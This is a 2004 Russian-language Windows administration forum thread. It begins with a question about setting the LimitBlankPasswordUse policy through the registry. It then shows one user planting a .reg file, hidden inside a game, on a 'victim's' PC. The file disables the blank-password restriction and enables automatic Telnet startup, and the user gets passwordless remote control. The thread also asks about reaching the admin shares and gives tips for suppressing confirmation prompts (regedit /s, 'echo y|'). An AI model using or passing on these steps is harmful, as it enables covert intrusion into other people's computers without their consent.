Security Lab



Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти  
Форум » Администрирование » Windows системы
Страницы: 1
RSS
политика безопасности через реестр и cmd
 
#1
Это нравится:0Да/0Нет
27.03.2004 21:40:30
как при помощи cmd и реестра отключить:
Accounts:Limit local account use the blank passwords to console logon only
 
 
 
#2
Это нравится:0Да/0Нет
27.03.2004 22:13:29
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
limitblankpassworduse (reg_dword)
как из cmd менять значение в реестре тоже объяснять?
reg add /?
 
 
 
#3
Это нравится:0Да/0Нет
28.03.2004 00:06:30
вот вот, большое пребольшое, это то что мне нужно. Не подскажешь где доки по настройке реестра взять, например, по безопасности. Вот вы это откуда знаете?
 
 
 
#4
Это нравится:0Да/0Нет
28.03.2004 01:12:10
А можно ли сделать так чтобы при запуске рег или бат файла не спрашивалось разрешение на применение этого параметра?
 
 
 
#5
Это нравится:0Да/0Нет
28.03.2004 08:25:45
regedit /s name_of_file.reg
Обратись к поисковикам. В сети море подобной информации.
 
 
 
#6
Это нравится:0Да/0Нет
28.03.2004 10:05:04
Цитата
domino пишет:
А можно ли сделать так чтобы при запуске рег или бат файла не спрашивалось разрешение на применение этого параметра?
я ж тебе написал
reg add /?
и никакого файла создавать не нужно
 
 
 
#7
Это нравится:0Да/0Нет
28.03.2004 10:32:35
Цитата
domino пишет:
вот вот, большое пребольшое, это то что мне нужно. Не подскажешь где доки по настройке реестра взять, например, по безопасности. Вот вы это откуда знаете?
Не поверишь, но если отбросить лень, то все элементарно.
В данном случае на твой вопрос ответ находится так:
Запускаем regedit.
Ищем строку "Limit local account"
Обнаруживаем ее в HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SeCEdit\Reg  Values\MACHINE/System/CurrentControlSet/Control/Lsa/LimitBla­ nkPasswordUse
То есть нужный тебе параметр находится в
MACHINE/System/CurrentControlSet/Control/Lsa/LimitBlankPassw­ ordUse
На всякий случай проверяем: Ищем "LimitBlankPasswordUse"
Находим его в HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
 
 
 
#8
Это нравится:0Да/0Нет
28.03.2004 14:54:28
Цитата
Michael пишет:
 
Цитата
domino пишет:
А можно ли сделать так чтобы при запуске рег или бат файла не спрашивалось разрешение на применение этого параметра?
я ж тебе написал
reg add /?
и никакого файла создавать не нужно
дело в том что я хочу этот самый бат файл подсунуть, именно поэтому спрашиваю как отключить (Yes/No)? Чтобы как говориться команды пользователя не обсуждались, а выполнялись:).
 
 
 
#9
Это нравится:0Да/0Нет
28.03.2004 15:27:27
Цитата
domino пишет:
 
Цитата
Michael пишет:
 
Цитата
domino пишет:
А можно ли сделать так чтобы при запуске рег или бат файла не спрашивалось разрешение на применение этого параметра?
я ж тебе написал
reg add /?
и никакого файла создавать не нужно
дело в том что я хочу этот самый бат файл подсунуть, именно поэтому спрашиваю как отключить (Yes/No)? Чтобы как говориться команды пользователя не обсуждались, а выполнялись:).
а зачем так извращаться? групповые политике не рулят? или нет возможности их применять?
тогда regedit /s file.reg
 
 
 
#10
Это нравится:0Да/0Нет
29.03.2004 21:08:10
параметр Accounts:Limit local account use the blank passwords to console logon only запрещает подключаться для администрирования к удаленному серверу, если на нем не стоит пароль. У жертвы имеется программа Network Assistant 3.1 (кстати, на мой взгляд самая лучшая для общения по локальной сети), так вот у него безопастность настроена криво в этой проге, короче можно запускать процессы от его имени, но активное окно процесса будет отоьражаться на его мониторе, а не на моем. Я хочу запустить бат или рег файл от его имени.
 
 
 
#11
Это нравится:0Да/0Нет
30.03.2004 13:03:24
Вобщем получилось подсунуть ему рег файл вместе с игрой оторая не шла без ключей реестра, встроил туда следующее:
------------------------------------------
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"limitblankpassworduse"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TlntSvr]
"Start"=dword:00000002
-----------------------------------------------------
Теперь могу рулить его компом через телнет. Но вот проблема, не удается подключить расшареные по- умолчанию диски типа C$, D$. Пишет ошибку 5 отказано в доступе. Хотя к телнету подключаюсь нормально, без пароля, благодаря. Может в групповых политиках есть еще какие нибудь параметры, запрещающие подключать сетевой диск, если пароль отсутствует.? Кстати, при попытке подключиться через Computer Managment тоже ошибка 5.
 
 
 
#12
Это нравится:0Да/0Нет
02.04.2004 13:15:47
Если знаете как отключить Yes/no скажите пожалуйса.

>Ищем строку "Limit local account"
Обнаруживаем ее в HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SeCEdit\Reg Values\MACHINE/System/CurrentControlSet/Control/Lsa/LimitBla­ nkPasswordUse
То есть нужный тебе параметр находится в
MACHINE/System/CurrentControlSet/Control/Lsa/LimitBlankPassw­ ordUse
На всякий случай проверяем: Ищем "LimitBlankPasswordUse"
Находим его в HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa

это да, а вот это как и где искать?

Разрешать вход в систему через службу терминаловКонфигурация компьютера\Конфигурация Windows\Параметры безопасности\Локальные политики\Назначение прав пользователя

Allow log on throught terminal services
 
 
 
#13
Это нравится:0Да/0Нет
02.04.2004 14:47:12
А в реестре нет?
 
 
 
#14
Это нравится:0Да/0Нет
02.04.2004 14:56:40
искал Allow log on throught terminal ser;log on;
Allow log on e.t.c. но не нашел, или может не понял что это оно. кто знает где этот параметр в реестре.
 
 
 
#15
Это нравится:0Да/0Нет
08.04.2004 22:25:51
Решил проблему с yes/no. Вот если кому интересно, перед командой которая требует yes/no надо прописать
"echo y|" или "echo n|", далее сразу же за | без пробела следует командаю
 
 
 
Страницы: 1
Читают тему